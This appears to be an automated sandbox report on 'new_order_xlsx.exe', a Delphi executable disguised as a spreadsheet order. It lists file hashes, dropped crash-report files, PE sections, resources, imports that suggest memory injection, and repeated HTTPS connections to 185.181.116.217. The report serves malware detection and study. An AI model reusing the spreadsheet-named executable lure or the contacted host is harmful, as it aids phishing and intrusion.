                      SHA-512:2811EA0E590D879ED9DDB094BD926E01E20B4E98C96FC1D6C055289FE5B31805C2F9DD3DA1DB953F715C48155C0BEDFBEC160A72B1C949BC2ADE495C1B5BB432
                      Malicious:false
                      Reputation:low
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.9.6.<./.P.i.d.>.......
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4593
                      Entropy (8bit):4.477186138055893
                      Encrypted:false
                      SSDEEP:48:cvIwSD8zs/JgtWI9GK6oWgc8sqYjZb8fm8M4J2lFl+q83jt+ld:uITfh/K6BgrsqYqJEat+ld
                      MD5:F7EAEFE2CA59937DAD954351942371DF
                      SHA1:51F75CF2393D3AADF265E9F7B997F1F92E252108
                      SHA-256:B89AE1AAB556AE044733CD4175D9A5CD5636D86851E97EFF5FB32C30053DA508
                      SHA-512:5B676A2738CE044F506AEAC89F92CEB5AB58514DB5B73EF01700BCE808B93F5A244B4CBBDC2F2C367A69E37466F4CFDF53DC2CF9F7A7792329A1F67A4FAAD56F
                      Malicious:false
                      Reputation:low
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2203176" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):1572864
                      Entropy (8bit):4.372160062266383
                      Encrypted:false
                      SSDEEP:12288:iVF6pHZamoSQR1LItX9ES064xQXkKog+1OAiYiVoZrUbVsZnzA3T:UF6pHZamoSy1LII3xf
                      MD5:A8ADA9F63B95868AFB81F0844D47A88A
                      SHA1:40A88DDFC46C864715E80B378DD474E185B2430C
                      SHA-256:65F4ED124841F6E030F5E97B620018C877759138B4F83C9177BCCBE5BAFB9A3A
                      SHA-512:2CFF34A15B5305DEC42688EC1CFF3ECBF5CB525F4501FDB80E2BC7819DBC894DDADD49817A392837551B8A4272692C3950798BB753B060DA864788D238412422
                      Malicious:false
                      Reputation:low
                      Preview:regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm^...;...............................................................................................................................................................................................................................................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):28672
                      Entropy (8bit):4.111386167865578
                      Encrypted:false
                      SSDEEP:768:VWAHSoE1k/CwrT5d7yrZrTeNLNI/ldWc5+JZZPYmKRPJ:xPh/m6
                      MD5:54AD563EE1C90EED6160861CC17BD2B1
                      SHA1:40D0D1C9851A7AFAD7B4DC0DA0BD0F8DD038140D
                      SHA-256:30419D57369BD0F2CC2EFF8450F413443796739785D7C99A91FB6C410CB84F50
                      SHA-512:D2A01483784A3F3A9A3079F34D19AF89404659DFC738E40D62B2FD68CBA26257ED1FA193EA7583E5DDD58104C8581F8BE021B24C5BA98A9EA0F12BAA758ADF76
                      Malicious:false
                      Reputation:low
                      Preview:regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm^...;...............................................................................................................................................................................................................................................................................................................................................#...HvLE.n......Y...........6F*.]...g...#...................0...............`... ..hbin................p.\..,..........nk,.\...;.......@........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .e...;....... ........................... .......Z.......................Root........lf......Root....nk .e...;................................... ...............*...............DeviceCensus.......................vk..................WritePermissions
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.588119453866235
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.66%
                      • Win32 Executable Delphi generic (14689/80) 0.15%
                      • Windows Screen Saver (13104/52) 0.13%
                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      File name:new_order_xlsx.exe
                      File size:1'516'544 bytes
                      MD5:ef6025979e7e27041ef72650fdbe8630
                      SHA1:8ac15cf845249b2a7c9c095808153656579b1704
                      SHA256:5c8d558572c445f5fdadc3758c208654d7dd2787a73a2a1e1757e87dd19d6fad
                      SHA512:366a49d28744c8608e752eacf277beb3277864bf750068b181f1bacc162ad3851c39a99c4b19974c5689aa11c75f1226f01ad348b8bac28b9e17e404e6c85367
                      SSDEEP:24576:/UWyWyLFqghcA0n9WUS20tFJTtf7BtdZhPKRZUW0YEq0UxX8OCTL5GJ:/UWX7WUktFJT5BtdZpWWqxxX8O0L5W
                      TLSH:CA65D055F2534473D1677930C8AB9396D8A8BE702E2CA50EAAE03F58CF363C57835276
                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                      Icon Hash:71f9919286b2a1a5
                      Entrypoint:0x47544c
                      Entrypoint Section:CODE
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      DLL Characteristics:
                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:555fbb180099f7ea0a0860999295d5a4
                      Instruction
                      push ebp
                      mov ebp, esp
                      add esp, FFFFFFF0h
                      mov eax, 004751D4h
                      call 00007F3E6518A319h
                      mov eax, dword ptr [00549C30h]
                      mov eax, dword ptr [eax]
                      call 00007F3E651D7C39h
                      mov eax, dword ptr [00549C30h]
                      mov eax, dword ptr [eax]
                      mov edx, 004754ACh
                      call 00007F3E651D7828h
                      mov ecx, dword ptr [005499F4h]
                      mov eax, dword ptr [00549C30h]
                      mov eax, dword ptr [eax]
                      mov edx, dword ptr [00474FA8h]
                      call 00007F3E651D7C28h
                      mov eax, dword ptr [00549C30h]
                      mov eax, dword ptr [eax]
                      call 00007F3E651D7C9Ch
                      call 00007F3E65187ECFh
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x14b0000x234c.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1580000x20400.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1500000x7148.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x14f0000x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      CODE0x10000x744b80x74600False0.526922076396348data6.571041625499515IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      DATA0x760000xd3dc80xd3e00False0.8124792588495575data7.77931741120788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      BSS0x14a0000xd010x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata0x14b0000x234c0x2400False0.3607855902777778data4.979560631692908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tls0x14e0000x100x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0x14f0000x180x200False0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                      .reloc0x1500000x71480x7200False0.6496367872807017data6.698392964417246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                      .rsrc0x1580000x204000x20400False0.7290531128875969data6.955198009447542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_CURSOR0x158b480x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                      RT_CURSOR0x158c7c0x134data0.4642857142857143
                      RT_CURSOR0x158db00x134data0.4805194805194805
                      RT_CURSOR0x158ee40x134data0.38311688311688313
                      RT_CURSOR0x1590180x134data0.36038961038961037
                      RT_CURSOR0x15914c0x134data0.4090909090909091
                      RT_CURSOR0x1592800x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                      RT_BITMAP0x1593b40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                      RT_BITMAP0x1595840x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                      RT_BITMAP0x1597680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                      RT_BITMAP0x1599380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                      RT_BITMAP0x159b080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                      RT_BITMAP0x159cd80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                      RT_BITMAP0x159ea80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                      RT_BITMAP0x15a0780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                      RT_BITMAP0x15a2480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                      RT_BITMAP0x15a4180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                      RT_BITMAP0x15a5e80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                      RT_ICON0x15a6d00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 67200.09186390532544379
                      RT_DIALOG0x15c1380x52data0.7682926829268293
                      RT_STRING0x15c18c0xa4data0.5914634146341463
                      RT_STRING0x15c2300x31cdata0.45979899497487436
                      RT_STRING0x15c54c0x1dcdata0.3592436974789916
                      RT_STRING0x15c7280x154data0.5470588235294118
                      RT_STRING0x15c87c0x240data0.4565972222222222
                      RT_STRING0x15cabc0x184data0.5489690721649485
                      RT_STRING0x15cc400xe8data0.5991379310344828
                      RT_STRING0x15cd280x138data0.5512820512820513
                      RT_STRING0x15ce600x3ecdata0.40239043824701193
                      RT_STRING0x15d24c0x390data0.37390350877192985
                      RT_STRING0x15d5dc0x3a4data0.34763948497854075
                      RT_STRING0x15d9800x3e8data0.384
                      RT_STRING0x15dd680xf4data0.47540983606557374
                      RT_STRING0x15de5c0xc4data0.5663265306122449
                      RT_STRING0x15df200x2c0data0.4446022727272727
                      RT_STRING0x15e1e00x478data0.2928321678321678
                      RT_STRING0x15e6580x3acdata0.37553191489361704
                      RT_STRING0x15ea040x2d4data0.4046961325966851
                      RT_RCDATA0x15ecd80x10data1.5
                      RT_RCDATA0x15ece80x30cdata0.7153846153846154
                      RT_RCDATA0x15eff40x18fe6Delphi compiled form 'TGoFrm'0.8656983218395295
                      RT_GROUP_CURSOR0x177fdc0x14Lotus unknown worksheet or configuration, revision 0x11.25
                      RT_GROUP_CURSOR0x177ff00x14Lotus unknown worksheet or configuration, revision 0x11.25
                      RT_GROUP_CURSOR0x1780040x14Lotus unknown worksheet or configuration, revision 0x11.3
                      RT_GROUP_CURSOR0x1780180x14Lotus unknown worksheet or configuration, revision 0x11.3
                      RT_GROUP_CURSOR0x17802c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                      RT_GROUP_CURSOR0x1780400x14Lotus unknown worksheet or configuration, revision 0x11.3
                      RT_GROUP_CURSOR0x1780540x14Lotus unknown worksheet or configuration, revision 0x11.3
                      RT_GROUP_ICON0x1780680x14data1.25
                      RT_MANIFEST0x17807c0x2f0XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5199468085106383
                      DLLImport
                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                      kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursorInfo, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                      kernel32.dllSleep
                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                      ole32.dllCoUninitialize, CoInitialize
                      oleaut32.dllGetErrorInfo, SysFreeString
                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                      ntdllNtWriteVirtualMemory, NtProtectVirtualMemory
                      uRLTelnetProtocolHandler
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 4, 2023 16:25:05.681468010 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:05.681515932 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:05.681598902 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:05.688863039 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:05.688890934 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:05.774038076 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:05.774270058 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:05.785358906 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:05.785396099 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:05.786019087 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:05.827568054 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.060097933 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.093655109 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.093748093 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.093811035 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.095549107 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.095571041 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.095613003 CEST49708443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.095619917 CEST44349708185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.465183020 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.465243101 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.465347052 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.466113091 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.466140985 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.548719883 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.548979044 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.551716089 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.551763058 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.552231073 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.554780006 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.599503040 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.648830891 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.648927927 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.649013042 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.662549019 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.662585974 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:06.662609100 CEST49709443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:06.662617922 CEST44349709185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.014911890 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.014966011 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.015064955 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.016093016 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.016124964 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.095648050 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.098819971 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.099126101 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.099159002 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.099916935 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.103077888 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.147511959 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.197932959 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.198074102 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.198189020 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.198647022 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.198676109 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.198718071 CEST49710443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.198734999 CEST44349710185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.552195072 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.552243948 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.552345037 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.553155899 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.553170919 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.632131100 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.632347107 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.634443998 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.634484053 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.635030031 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.637063026 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.679505110 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.735403061 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.735531092 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.735661983 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.735929966 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.735958099 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:07.736006021 CEST49711443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:07.736016035 CEST44349711185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:08.120863914 CEST49712443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:08.120930910 CEST44349712185.181.116.217192.168.2.4
                      Sep 4, 2023 16:25:08.121049881 CEST49712443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:08.122181892 CEST49712443192.168.2.4185.181.116.217
                      Sep 4, 2023 16:25:08.122226000 CEST44349712185.181.116.217192.168.2.4
